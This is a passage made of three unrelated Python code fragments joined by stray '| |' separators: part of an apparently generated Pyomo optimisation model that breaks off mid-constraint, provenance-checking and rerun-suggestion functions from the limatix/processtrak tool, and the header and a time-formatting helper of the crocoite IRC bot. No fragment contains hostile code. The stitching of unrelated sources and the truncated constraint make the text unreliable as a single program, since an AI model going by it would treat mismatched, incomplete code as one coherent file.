m.b1948 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1949 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1950 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1951 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1952 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1953 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1954 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1955 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1956 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1957 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1958 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1959 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1960 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1961 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1962 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1963 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1964 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1965 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1966 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1967 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1968 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1969 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1970 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1971 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1972 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1973 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1974 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1975 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1976 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1977 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1978 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1979 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1980 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1981 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1982 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1983 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1984 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1985 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1986 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1987 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1988 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1989 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1990 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1991 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1992 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1993 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1994 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1995 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1996 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1997 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1998 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b1999 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2000 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2001 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2002 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2003 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2004 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2005 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2006 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2007 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2008 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2009 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2010 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2011 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2012 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2013 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2014 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2015 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2016 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2017 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2018 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2019 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2020 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2021 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2022 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2023 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2024 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2025 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2026 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2027 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2028 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2029 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2030 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2031 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2032 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2033 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2034 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2035 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2036 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2037 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2038 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2039 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2040 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2041 = Var(within=Binary,bounds=(0,1),initialize=0)
m.obj = Objective(expr= - 10*m.x2 - 7*m.x3 - 5*m.x4 - 15*m.x17 - 11*m.x18 - 9*m.x19 - 18*m.x29 - 14*m.x30 - 10*m.x31
- 19*m.x65 - 17*m.x66 - 17*m.x67 + 32*m.x77 + 41*m.x78 + 31*m.x79 + 40*m.x83 + 39*m.x84
+ 27*m.x85 - 16*m.x86 - 16*m.x87 - 15*m.x88 + 2*m.x95 + 2*m.x96 + 2*m.x97 + 3*m.x98 + 2*m.x99
+ 2*m.x100 + 3*m.x101 + 3*m.x102 + 3*m.x103 + 2*m.x104 + 2*m.x105 + 2*m.x106 - 6*m.b923
- 4*m.b924 - 3*m.b925 - 40*m.b926 - 35*m.b927 - 20*m.b928 - 46*m.b929 - 39*m.b930 - 23*m.b931
- 7*m.b935 - 4*m.b936 - 4*m.b937 - 30*m.b938 - 25*m.b939 - 20*m.b940 - 37*m.b941 - 29*m.b942
- 22*m.b943 - 7*m.b947 - 5*m.b948 - 3*m.b949 - 15*m.b950 - 5*m.b951 - 2*m.b952 - 22*m.b953
- 10*m.b954 - 5*m.b955 - 11*m.b959 - 8*m.b960 - 6*m.b961 - 13*m.b962 - 8*m.b963 - 3*m.b964
- 24*m.b965 - 16*m.b966 - 9*m.b967 - 10*m.b971 - 7*m.b972 - 6*m.b973 - 13*m.b974 - 8*m.b975
- 3*m.b976 - 23*m.b977 - 15*m.b978 - 9*m.b979 - 9*m.b983 - 9*m.b984 - 7*m.b985 - 30*m.b986
- 30*m.b987 - 25*m.b988 - 39*m.b989 - 39*m.b990 - 32*m.b991 - 8*m.b995 - 7*m.b996 - 7*m.b997
- 20*m.b998 - 15*m.b999 - 10*m.b1000 - 28*m.b1001 - 22*m.b1002 - 17*m.b1003 - 8*m.b1007
- 6*m.b1008 - 5*m.b1009 - 15*m.b1010 - 10*m.b1011 - 6*m.b1012 - 23*m.b1013 - 16*m.b1014
- 11*m.b1015 - m.x1016 - m.x1017 - m.x1018 + 5*m.x1034 + 10*m.x1035 + 5*m.x1036 - 2*m.x1049
- m.x1050 - 2*m.x1051 - 10*m.x1100 - 5*m.x1101 - 5*m.x1102 - 5*m.x1103 - 5*m.x1104 - 5*m.x1105
+ 40*m.x1124 + 30*m.x1125 + 15*m.x1126 + 15*m.x1127 + 20*m.x1128 + 25*m.x1129 + 10*m.x1130
+ 30*m.x1131 + 40*m.x1132 + 30*m.x1133 + 20*m.x1134 + 20*m.x1135 + 35*m.x1136 + 50*m.x1137
+ 20*m.x1138 + 20*m.x1139 + 30*m.x1140 + 35*m.x1141 + 25*m.x1142 + 50*m.x1143 + 10*m.x1144
+ 15*m.x1145 + 20*m.x1146 + 20*m.x1147 + 30*m.x1169 + 40*m.x1170 + 40*m.x1171 - m.x1184
- m.x1185 - m.x1186 - 5*m.x1235 - 3*m.x1236 - 4*m.x1237 - m.x1238 - m.x1239 - m.x1240
+ 120*m.x1259 + 110*m.x1260 + 150*m.x1261 + 140*m.x1262 + 120*m.x1263 + 100*m.x1264 + 90*m.x1265
+ 60*m.x1266 + 150*m.x1267 + 80*m.x1268 + 90*m.x1269 + 120*m.x1270 + 285*m.x1271 + 390*m.x1272
+ 350*m.x1273 + 290*m.x1274 + 405*m.x1275 + 190*m.x1276 + 280*m.x1277 + 400*m.x1278
+ 430*m.x1279 + 290*m.x1280 + 300*m.x1281 + 240*m.x1282 + 350*m.x1283 + 250*m.x1284
+ 300*m.x1285 - 5*m.b1922 - 4*m.b1923 - 6*m.b1924 - 8*m.b1925 - 7*m.b1926 - 6*m.b1927
- 6*m.b1928 - 9*m.b1929 - 4*m.b1930 - 10*m.b1931 - 9*m.b1932 - 5*m.b1933 - 6*m.b1934
- 10*m.b1935 - 6*m.b1936 - 7*m.b1937 - 7*m.b1938 - 4*m.b1939 - 4*m.b1940 - 3*m.b1941 - 2*m.b1942
- 5*m.b1943 - 6*m.b1944 - 7*m.b1945 - 2*m.b1946 - 5*m.b1947 - 2*m.b1948 - 4*m.b1949 - 7*m.b1950
- 4*m.b1951 - 3*m.b1952 - 9*m.b1953 - 3*m.b1954 - 7*m.b1955 - 2*m.b1956 - 9*m.b1957 - 3*m.b1958
- m.b1959 - 9*m.b1960 - 2*m.b1961 - 6*m.b1962 - 3*m.b1963 - 4*m.b1964 - 8*m.b1965 - m.b1966
- 2*m.b1967 - 5*m.b1968 - 2*m.b1969 - 3*m.b1970 - 4*m.b1971 - 3*m.b1972 - 5*m.b1973 - 7*m.b1974
- 6*m.b1975 - 2*m.b1976 - 8*m.b1977 - 4*m.b1978 - m.b1979 - 4*m.b1980 - m.b1981 - 2*m.b1982
- 5*m.b1983 - 2*m.b1984 - 9*m.b1985 - 2*m.b1986 - 9*m.b1987 - 5*m.b1988 - 8*m.b1989 - 4*m.b1990
- 2*m.b1991 - 3*m.b1992 - 8*m.b1993 - 10*m.b1994 - 6*m.b1995 - 3*m.b1996 - 4*m.b1997 - 8*m.b1998
- 7*m.b1999 - 7*m.b2000 - 3*m.b2001 - 9*m.b2002 - 4*m.b2003 - 8*m.b2004 - 6*m.b2005 - 2*m.b2006
- m.b2007 - 3*m.b2008 - 8*m.b2009 - 3*m.b2010 - 4*m.b2011 - 9*m.b2012 - 5*m.b2013 - m.b2014
- 3*m.b2015 - 9*m.b2016 - 5*m.b2017 - 5*m.b2018 - 3*m.b2019 - 3*m.b2020 - 5*m.b2021 - 3*m.b2022
- 2*m.b2023 - 6*m.b2024 - 4*m.b2025 - 6*m.b2026 - 2*m.b2027 - 6*m.b2028 - 6*m.b2029 - 6*m.b2030
- 4*m.b2031 - 3*m.b2032 - 3*m.b2033 - 2*m.b2034 - m.b2035 - 5*m.b2036 - 8*m.b2037 - 6*m.b2038
- 9*m.b2039 - 5*m.b2040 - 2*m.b2041, sense=maximize)
m.c2 = Constraint(expr= m.x2 - 0.2*m.x107 == 0)
m.c3 = Constraint(expr= m.x3 - 0.2*m.x108 == 0)
m.c4 = Constraint(expr= m.x4 - 0.2*m.x109 == 0)
m.c5 = Constraint(expr= m.x5 - 0.2*m.x110 == 0)
m.c6 = Constraint(expr= m.x6 - 0.2*m.x111 == 0)
m.c7 = Constraint(expr= m.x7 - 0.2*m.x112 == 0)
m.c8 = Constraint(expr= m.x8 - 0.2*m.x113 == 0)
m.c9 = Constraint(expr= m.x9 - 0.2*m.x114 == 0)
m.c10 = Constraint(expr= m.x10 - 0.2*m.x115 == 0)
m.c11 = Constraint(expr= m.x11 - 0.2*m.x116 == 0)
m.c12 = Constraint(expr= m.x12 - 0.2*m.x117 == 0)
m.c13 = Constraint(expr= m.x13 - 0.2*m.x118 == 0)
m.c14 = Constraint(expr= m.x14 - 0.2*m.x119 == 0)
m.c15 = Constraint(expr= m.x15 - 0.2*m.x120 == 0)
m.c16 = Constraint(expr= m.x16 - 0.2*m.x121 == 0)
m.c17 = Constraint(expr= m.x17 - 0.5*m.x122 == 0)
m.c18 = Constraint(expr= m.x18 - 0.5*m.x123 == 0)
m.c19 = Constraint(expr= m.x19 - 0.5*m.x124 == 0)
m.c20 = Constraint(expr= m.x20 - 0.5*m.x125 == 0)
m.c21 = Constraint(expr= m.x21 - 0.5*m.x126 == 0)
m.c22 = Constraint(expr= m.x22 - 0.5*m.x127 == 0)
m.c23 = Constraint(expr= m.x23 - 0.7*m.x128 == 0)
m.c24 = Constraint(expr= m.x24 - 0.7*m.x129 == 0)
m.c25 = Constraint(expr= m.x25 - 0.7*m.x130 == 0)
m.c26 = Constraint(expr= m.x26 - 0.7*m.x131 == 0)
m.c27 = Constraint(expr= m.x27 - 0.7*m.x132 == 0)
m.c28 = Constraint(expr= m.x28 - 0.7*m.x133 == 0)
m.c29 = Constraint(expr= m.x29 - 1.2*m.x134 == 0)
m.c30 = Constraint(expr= m.x30 - 1.2*m.x135 == 0)
m.c31 = Constraint(expr= m.x31 - 1.2*m.x136 == 0)
m.c32 = Constraint(expr= m.x32 - 1.2*m.x137 == 0)
m.c33 = Constraint(expr= m.x33 - 1.2*m.x138 == 0)
m.c34 = Constraint(expr= m.x34 - 1.2*m.x139 == 0)
m.c35 = Constraint(expr= m.x35 - 0.5*m.x140 == 0)
m.c36 = Constraint(expr= m.x36 - 0.5*m.x141 == 0)
m.c37 = Constraint(expr= m.x37 - 0.5*m.x142 == 0)
m.c38 = Constraint(expr= m.x38 - 0.7*m.x143 == 0)
m.c39 = Constraint(expr= m.x39 - 0.7*m.x144 == 0)
m.c40 = Constraint(expr= m.x40 - 0.7*m.x145 == 0)
m.c41 = Constraint(expr= m.x41 - 1.2*m.x146 == 0)
m.c42 = Constraint(expr= m.x42 - 1.2*m.x147 == 0)
m.c43 = Constraint(expr= m.x43 - 1.2*m.x148 == 0)
m.c44 = Constraint(expr= m.x44 - 1.2*m.x149 == 0)
m.c45 = Constraint(expr= m.x45 - 1.2*m.x150 == 0)
m.c46 = Constraint(expr= m.x46 - 1.2*m.x151 == 0)
m.c47 = Constraint(expr= m.x47 - 1.2*m.x152 == 0)
m.c48 = Constraint(expr= m.x48 - 1.2*m.x153 == 0)
m.c49 = Constraint(expr= m.x49 - 1.2*m.x154 == 0)
m.c50 = Constraint(expr= m.x50 - 1.2*m.x155 | |
Find lip:process tags and fill in uuid dictionaries
findprocesstags(xmldocu,xmldocu.getroot(),None,processtagbyuuid,childuuidbyuuid,processtagsnouuid)
obsoleteprocesstagbyuuid={} # Will move from processtagbyuuid into here as we determine tags are obsolete
obsolete_root_uuids=[]
for uuid in list(processtagbyuuid.keys()):
if uuid in processtagbyuuid:
# Move process and sub-processes into obsoleteprocesstagbyuuid if they are obsolete
if process_is_obsolete(processdict,processtagbyuuid,obsoleteprocesstagbyuuid,childuuidbyuuid,uuid):
# This is a root of an obsolete tree, because if we were at a branch or leaf of an obsolete tree, it would have been removed before we got here
obsolete_root_uuids.append(uuid)
pass
pass
pass
msg="Removed %d process tags containing %d total lip:provenance elements (%d remaining)" % (len(obsolete_root_uuids)+len(processtagsnouuid),len(obsoleteprocesstagbyuuid),len(processtagbyuuid))
for processtag in processtagsnouuid:
xmldocu.remelement(processtag)
pass
for uuid in obsolete_root_uuids:
processtag=obsoleteprocesstagbyuuid[uuid]
xmldocu.remelement(processtag)
pass
return msg
def checkallprovenance(xmldocu):
# xmldocu must be in memory... i.e. either locked
# or read in with locking (now) disabled
docdict={}
docdict[xmldocu.get_filehref()]=xmldocu
processdict={}
processdictbyhrefc={}
processdictbyusedelement={}
elementdict={}
globalmessagelists={"error": [],
"warning": [],
"info": [],
"none": []}
treeroot=xmldocu.doc.getroot()
for descendent in iterelementsbutskip(treeroot,LIP+"process"):
refuuids_or_mtime=None
if LIP+"wasgeneratedby" in descendent.attrib:
refuuids_or_mtime=str(descendent.attrib[LIP+"wasgeneratedby"])
pass
else :
globalmessagelists["warning"].append("Element %s does not have lip:wasgenerateby provenance" % (href_context.fromelement(xmldocu,descendent).humanurl()))
pass
element_hrefc=href_context.fromelement(xmldocu,descendent)
checkprovenance("",element_hrefc,refuuids_or_mtime,nsmap=xmldocu.nsmap,docdict=docdict,processdict=processdict,processdictbyhrefc=processdictbyhrefc,processdictbyusedelement=processdictbyusedelement,elementdict=elementdict,globalmessagelists=globalmessagelists)
pass
# merge all messages into totalmessagelists...
# element messages:
totalmessagelists=copy.deepcopy(globalmessagelists)
for elementinfo in elementdict:
(processuuidlist,messagelists)=elementdict[elementinfo]
for messagekey in messagelists:
totalmessagelists[messagekey].extend(messagelists[messagekey])
pass
pass
# process messages:
for processuuid in processdict:
(processpath,elementinfolist,messagelists,parent_process_uuid_or_None)=processdict[processuuid]
for messagekey in messagelists:
totalmessagelists[messagekey].extend(messagelists[messagekey])
pass
pass
return (docdict,processdict,processdictbyhrefc,processdictbyusedelement,elementdict,globalmessagelists,totalmessagelists)
def find_process_value_or_ancestor(process_el,tagpath,default=AttributeError("Could not find tag")):
# tag should use lip: prefix
# print "tag:",tag
gottags=process_el.xpath(tagpath,namespaces={"lip":lip})
if len(gottags)==0:
parent=process_el.getparent()
if parent.tag==LIP+"process":
return find_process_value_or_ancestor(parent,tagpath,default=default)
if isinstance(default,BaseException):
raise default
else:
return default
pass
if len(gottags) > 1:
raise ValueError("Multiple tags: %s" % (unicode(gottags)))
return gottags[0]
def find_process_value_or_ancestor_text(process_el,tagpath,default=AttributeError("Could not find tag")):
ret=find_process_value_or_ancestor(process_el,tagpath,default=None)
if ret is None:
if isinstance(default,BaseException):
raise default
else:
return default
pass
return ret.text
def addquotesifnecessary(arg):
# Does not do robust quoting and escaping, but this should
# cover likely circumstances
okchars=set(string.digits+string.letters+"-_/.:")
if set(arg).issubset(okchars):
return arg
else:
return "\'"+arg+"\'"
pass
def removequotesifable(arg):
# Does not do robust quoting and escaping, but this should
# cover likely circumstances
startindex=arg.find('\'')
endindex=arg.rfind('\'')
usearg=arg[(startindex+1):endindex]
okchars=set(string.digits+string.letters+"-_/.:")
if set(usearg).issubset(okchars):
return usearg
else:
return arg[startindex:(endindex+1)]
pass
def getnonprocessparent(foundelement):
# Find the first non-lip:process parent of the specified element
# and return the node itself and the path from foundelement to
# that node.
#
# This used to be useful because lip:process relative ETXPaths are relative
# to the first non-process parent of the lip:process tag.
# So you take the location of the lip:process tag,
# append the path returned by this function,
# and append the relative etxpath,
# and finally canonicalize the result
context_node=foundelement.getparent()
append_path=".."
while context_node.tag==LIP+"process":
context_node=context_node.getparent()
append_path+="/.."
pass
return (context_node,append_path)
def suggest(docdict,processdict,processdictbyhrefc,processdictbyusedelement,elementdict,globalmessagelists,totalmessagelists):
from . import xmldoc # don't want this in top-of-file because it creates a circular reference
suggestion_processes=set([])
suggestions=set([])
suggestions_by_prxfile={}
prxfiles=set([])
# print("type(processdict)=%s" % (str(type(processdict))))
for elementinfo in elementdict:
(hrefc,uuid_or_mtime)=elementinfo
(processuuidlist,messagelists)=elementdict[elementinfo]
for message in messagelists["error"]:
if message.startswith("Object provenance does not match for"):
if elementinfo in processdictbyusedelement:
rerunprocess_uuids=processdictbyusedelement[elementinfo]
for rerunprocess_uuid in rerunprocess_uuids:
if rerunprocess_uuid not in processdict:
sys.stderr.write("Warning: process uuid %s not in processdict (?)\n" % (rerunprocess_uuid))
continue
(processhrefc,usedelements,messagelists,parent_uuid_or_None)=processdict[rerunprocess_uuid]
if processhrefc in suggestion_processes:
continue # already handled this process
suggestion_processes.add(processhrefc) # mark this one as handled
processfilehrefc=processhrefc.fragless()
if processfilehrefc not in docdict:
sys.stderr.write("Warning: URL %s not in docdict (?)\n" % (processfilehrefc.absurl()))
continue
xmldocu=docdict[processfilehrefc]
foundelement=processhrefc.evaluate_fragment(xmldocu,None,noprovenance=True)
if len(foundelement)==0:
sys.stderr.write("Warning: Could not find process path %s in URL %s\n" % (processhrefc.gethumanfragment(),processfilehrefc.absurl()))
continue
assert(len(foundelement)==1) # This would be triggered by a hash collision. Should be separately diagnosed in processing.
# foundelement[0] is the lip:process tag
inputfilehrefc=href_context.fromxml(xmldocu,find_process_value_or_ancestor(foundelement[0],"lip:inputfile"))
action=find_process_value_or_ancestor_text(foundelement[0],"lip:action",default="")
prxhrefc=href_context.fromxml(xmldocu,find_process_value_or_ancestor(foundelement[0],"lip:wascontrolledby/lip:prxfile"))
prxfiles.add(prxhrefc)
if not prxhrefc in suggestions_by_prxfile:
suggestions_by_prxfile[prxhrefc]=set([])
pass
suggestions_by_prxfile[prxhrefc].add((inputfilehrefc,action))
pass
pass
pass
pass
pass
# go through each prxfile and suggest steps in order
# We don't worry about sorting prxfiles, because
# we don't expect to have multiple prxfiles
for prxfile_hrefc in prxfiles:
from . import xmldoc # don't want this in top-of-file because it creates a circular reference
from . import dc_value # don't want this in top-of-file because it creates a circular reference
print("prxfile_hrefc=%s" % (prxfile_hrefc.humanurl()))
prxfile_doc=xmldoc.xmldoc.loadhref(dc_value.hrefvalue(prxfile_hrefc),nsmap={"prx":"http://limatix.org/processtrak/processinginstructions","xlink":"http://www.w3.org/1999/xlink"})
prxfile_steps=prxfile_doc.xpath("prx:step")
prxfile_inputfiles=prxfile_doc.xpath("prx:inputfiles/prx:inputfile")
for step in prxfile_steps:
stepaction=processtrak_prxdoc.getstepname(prxfile_doc,step)
refdinputhrefcs=[inputfilehrefc for (inputfilehrefc,action) in suggestions_by_prxfile[prxfile_hrefc] if action==stepaction]
for refdinputhrefc in refdinputhrefcs:
suggestions_by_prxfile[prxfile_hrefc].remove((refdinputhrefc,stepaction))
# processtrak takes <inputfile> tag of prxfile
# Search for match between refdinputfile and the inputfiles specified in prx document
foundinputfile=False
for prxinputfile_el in prxfile_inputfiles:
prxinputfile_hrefc=href_context.fromxml(prxfile_doc,prxinputfile_el)
# prxinputfile=prxfile_doc.gettext(prxinputfile_el)
# if os.path.isabs(prxinputfile):
# prxinputfile_fullpath=prxinputfile
# pass
# else:
# prxinputfile_fullpath=os.path.join(prxfile_dir,prxinputfile)
# pass
# prxinputfile_canonpath=canonicalize_path.canonicalize_path(prxinputfile_fullpath)
# refdinputfile_canonpath=canonicalize_path.canonicalize_path(refdinputfile)
# print "prxinputfile=",prxinputfile_canonpath
# print "refdinputfile=",refdinputfile_canonpath
if prxinputfile_hrefc==refdinputhrefc:
foundinputfile=True
suggestions.add(("Rerun step %s on file %s." % (stepaction,prxinputfile_hrefc.humanurl()),"processtrak -s %s -f %s %s" % (addquotesifnecessary(stepaction),addquotesifnecessary(prxinputfile_hrefc.getpath()),addquotesifnecessary(prxfile_hrefc.getpath()))))
break
pass
if not foundinputfile:
sys.stderr.write("Could not find reference to input file %s in %s\n" % (refdinputhrefc.humanurl(),prxfile_hrefc.humanurl()))
pass
pass
pass
for (inputfilehrefc,stepaction) in suggestions_by_prxfile[prxfile_hrefc]:
sys.stderr.write("Unknown (inputfile,stepname) for %s: (%s,%s)\n" % (prxfile_hrefc.humanurl(),inputfilehrefc.humanurl(),stepaction))
pass
pass
return suggestions
def checkprovenance(history_stack,element_hrefc,refuuids_or_mtime,nsmap={},referrer_hrefc="",warnlevel="error",docdict=None,processdict=None,processdictbyhrefc=None,processdictbyusedelement=None,elementdict=None,globalmessagelists=None):
# Find the provenance of element_hrefc
# start with a history_stack of ""
# refuuids_or_mtime is None or the expected "uuid=" or "mtime=" provenance of this particular element
# docdict, processdict, processdictbyhrefc, processdictbyusedelement, elementdict, and global messagelists should be empty. They will be filled
#
# docdict: cached dictionary by fragless hrefc of xmldoc documents
# processdict: cached dictionary by uuid of (hrefcs to lip:process elements, [list of (element hrefc,uuid_or_mtime)],messagelists,parent_process_uuid_or_None) ... parent process is implicit WasControlledBy
# processdictbyhrefc: dictionary by hrefc of uuids for processdict
# processdictbyusedelement: dictionary by (element hrefc,uuid_or_mtime) of [list of uuids for processes that used that element ]
# elementdict dictionary by (hrefc,uuid_or_mtime) tuples that we have processed of ([list of process uuids],messagelists)
# messagelists & globalmessagelists: dictionary by error type of lists of error messages
# Currently ignore pymodule references.
# note: functionality of referrer_hrefc mostly replaced by history_stack
new_history_stack=history_stack+"/"+element_hrefc.humanurl()
if refuuids_or_mtime is not None:
refuuids_or_mtime=str(refuuids_or_mtime) # in case it is some sort of alternate string
pass
if docdict is None:
docdict={}
pass
if processdict is None:
processdict={}
pass
if processdictbyhrefc is None:
processdictbyhrefc={}
pass
if processdictbyusedelement is None:
processdictbyusedelement={}
pass
if elementdict is None:
elementdict={}
pass
if globalmessagelists is None:
globalmessagelists={"error": [],
"warning": [],
"info": [],
"none": []}
pass
messagelisttemplate={"error": [],
"warning": [],
"info": [],
"none": []}
# fh=file("/tmp/provlog","a")
# fh.write(element_hrefc+"\t"+str(refuuids_or_mtime)+"\n")
# fh.close()
if (element_hrefc,refuuids_or_mtime) in elementdict:
return # already processed this element
# NOTE: Can probably optimize here. When refuuid_or_mtime is passed as None -- implying current element -- is there a way to automatically identify if we have previously processed it?... less of an issue now that checkallprovenance passes refuuid_or_mtime
if element_hrefc in processdictbyhrefc:
return # already processed this lip:process element
# sys.stderr.write("element_hrefc="+str(element_hrefc)+"\n")
filehrefc=element_hrefc.fragless()
# sys.stderr.write("filehrefc="+str(filehrefc)+"\n")
#(filepath,etxpath)=canonicalize_path.canonical_etxpath_break_out_file(element_etxpath)
if element_hrefc.has_fragment():
# not just a file...
# load file and extract provenance uuids if possible
if refuuids_or_mtime is not None and refuuids_or_mtime.startswith("mtime="):
# mtime specified on something with a fragment
errmsg="Attempting to specify mtime provenance %s for an element %s inside a file. Referrer=%s" % (refuuids_or_mtime,element_hrefc.humanurl(),referrer_hrefc.humanurl())
if referrer_hrefc in processdictbyhrefc:
processdict[processdictbyhrefc[referrer_hrefc]][2]["error"].append(errmsg)
pass
else:
globalmessagelists["error"].append(errmsg)
pass
pass
if filehrefc in docdict:
xmldocu=docdict[filehrefc]
pass
else :
xmldocu=None
try :
from . import xmldoc # don't want this in top-of-file because it creates a circular reference
from . import dc_value # don't want this in top-of-file because it creates a circular reference
xmldocu=xmldoc.xmldoc.loadhref(dc_value.hrefvalue(filehrefc.fragless()))
pass
except IOError:
errmsg="URL %s missing for %s referred by %s." % (filehrefc.humanurl(),element_hrefc.humanurl(),referrer_hrefc.humanurl())
sys.stderr.write(errmsg+"\n")
if referrer_hrefc in processdictbyhrefc:
processdict[processdictbyhrefc[referrer_hrefc]][2]["error"].append(errmsg)
pass
else :
globalmessagelists["error"].append(errmsg)
pass
pass
docdict[filehrefc]=xmldocu
pass
if xmldocu is None:
return # nothing to do... error would have been diagnosed above
foundelement=element_hrefc.evaluate_fragment(xmldocu,None,noprovenance=True)
if len(foundelement)==0:
elementdict[(element_hrefc,refuuids_or_mtime)]=([],copy.deepcopy(messagelisttemplate)) # mark that we have done this
# Add error message to messagelists
elementdict[(element_hrefc,refuuids_or_mtime)][1]["error"].append("Object %s missing referred by via %s" % (element_hrefc.humanurl(),history_stack)) #,referrer_hrefc.humanurl()))
pass
elif len(foundelement) > 1:
elementdict[(element_hrefc,refuuids_or_mtime)]=([],copy.deepcopy(messagelisttemplate)) # mark that we have done this
# add error to messagelists
| |
# Copyright (c) 2017–2018 crocoite contributors
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""
IRC bot “chromebot”
"""
import asyncio, argparse, json, tempfile, time, random, os, shlex
from datetime import datetime
from urllib.parse import urlsplit
from enum import IntEnum, unique
from collections import defaultdict
from abc import abstractmethod
from functools import wraps
import bottom
import websockets
from .util import StrJsonEncoder
from .cli import cookie
### helper functions ###
def prettyTimeDelta (seconds):
"""
Pretty-print seconds to human readable string 1d 1h 1m 1s
"""
seconds = int(seconds)
days, seconds = divmod(seconds, 86400)
hours, seconds = divmod(seconds, 3600)
minutes, seconds = divmod(seconds, 60)
s = [(days, 'd'), (hours, 'h'), (minutes, 'm'), (seconds, 's')]
s = filter (lambda x: x[0] != 0, s)
return ' '.join (map (lambda x: '{}{}'.format (*x), s))
